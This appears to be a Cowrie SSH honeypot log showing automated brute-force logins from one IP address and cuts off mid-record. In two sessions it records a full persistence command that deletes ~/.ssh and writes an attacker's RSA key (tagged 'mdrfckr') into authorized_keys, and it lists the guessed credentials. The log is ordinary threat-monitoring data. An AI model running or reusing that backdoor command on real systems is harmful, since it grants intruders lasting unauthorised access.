{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:04.943417Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@111","message":"login attempt [root/Admin@111] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:33:06.226923Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:33:06.925606Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:33:06.926449Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:33:06.927624Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:07.238851Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:33:07.876497Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:33:07.877221Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:33:08.190237Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:08.191195Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43992,"dst_ip":"1.2.3.4","dst_port":22,"session":"2623e62b5662","protocol":"ssh","message":"New connection: 212.227.235.229:43992 (1.2.3.4:22) [session: 2623e62b5662]","sensor":"my-vps","timestamp":"2025-09-09T01:33:08.376636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:08.377327Z","src_ip":"212.227.235.229","session":"2623e62b5662"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:08.623966Z","src_ip":"212.227.235.229","session":"2623e62b5662"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:33:09.652081Z","src_ip":"212.227.235.229","session":"2623e62b5662"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:10.900641Z","src_ip":"212.227.235.229","session":"2623e62b5662"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44004,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd8bab57d920","protocol":"ssh","message":"New connection: 212.227.235.229:44004 (1.2.3.4:22) [session: dd8bab57d920]","sensor":"my-vps","timestamp":"2025-09-09T01:33:11.150496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:11.151253Z","src_ip":"212.227.235.229","session":"dd8bab57d920"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:11.399920Z","src_ip":"212.227.235.229","session":"dd8bab57d920"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47154,"dst_ip":"1.2.3.4","dst_port":22,"session":"68b2e87962a0","protocol":"ssh","message":"New connection: 212.227.235.229:47154 (1.2.3.4:22) [session: 68b2e87962a0]","sensor":"my-vps","timestamp":"2025-09-09T01:33:12.064055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:12.064947Z","src_ip":"212.227.235.229","session":"68b2e87962a0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:12.289466Z","src_ip":"212.227.235.229","session":"68b2e87962a0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:33:12.436650Z","src_ip":"212.227.235.229","session":"dd8bab57d920"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:12.686704Z","src_ip":"212.227.235.229","session":"dd8bab57d920"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:12.744611Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58058,"dst_ip":"1.2.3.4","dst_port":22,"session":"613b9338e9d2","protocol":"ssh","message":"New connection: 212.227.235.229:58058 (1.2.3.4:22) [session: 613b9338e9d2]","sensor":"my-vps","timestamp":"2025-09-09T01:33:13.090627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:13.101681Z","src_ip":"212.227.235.229","session":"613b9338e9d2"}
{"eventid":"cowrie.login.failed","username":"bob","password":"bob","message":"login attempt [bob/bob] failed","sensor":"my-vps","timestamp":"2025-09-09T01:33:13.228797Z","src_ip":"212.227.235.229","session":"68b2e87962a0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:14.271590Z","src_ip":"212.227.235.229","session":"613b9338e9d2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:14.455850Z","src_ip":"212.227.235.229","session":"68b2e87962a0"}
{"eventid":"cowrie.login.failed","username":"craft","password":"abc123","message":"login attempt [craft/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:33:15.025102Z","src_ip":"212.227.235.229","session":"613b9338e9d2"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:16.839319Z","src_ip":"212.227.235.229","session":"613b9338e9d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51408,"dst_ip":"1.2.3.4","dst_port":22,"session":"beb624f90de2","protocol":"ssh","message":"New connection: 212.227.235.229:51408 (1.2.3.4:22) [session: beb624f90de2]","sensor":"my-vps","timestamp":"2025-09-09T01:33:18.471873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:18.472871Z","src_ip":"212.227.235.229","session":"beb624f90de2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:18.739352Z","src_ip":"212.227.235.229","session":"beb624f90de2"}
{"eventid":"cowrie.login.failed","username":"default","password":"abc123","message":"login attempt [default/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:33:19.852742Z","src_ip":"212.227.235.229","session":"beb624f90de2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:21.121615Z","src_ip":"212.227.235.229","session":"beb624f90de2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45972,"dst_ip":"1.2.3.4","dst_port":22,"session":"f748b6026a93","protocol":"ssh","message":"New connection: 212.227.235.229:45972 (1.2.3.4:22) [session: f748b6026a93]","sensor":"my-vps","timestamp":"2025-09-09T01:33:29.689910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:29.690866Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:33:29.798521Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.login.success","username":"root","password":"Kong@2022","message":"login attempt [root/Kong@2022] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:33:30.269866Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:33:30.535014Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:33:30.535674Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:33:30.536490Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:30.645772Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:33:30.878060Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:33:30.878808Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:33:30.990203Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:33:30.991019Z","src_ip":"212.227.235.229","session":"f748b6026a93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45986,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0bbbfa41274","protocol":"ssh","message":"New connection: 212.227.235.229:45986 (1.2.3.4:22) [session: f0bbbfa41274]","sensor":"my-vps","timestamp":"2025-09-09T01:33:31.096277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:31.097324Z","src_ip":"212.227.235.229","session":"f0bbbfa41274"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-s